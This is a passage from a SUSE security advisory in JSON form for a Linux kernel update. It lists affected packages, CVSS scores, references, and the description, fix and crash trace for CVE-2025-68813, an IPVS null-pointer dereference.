"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
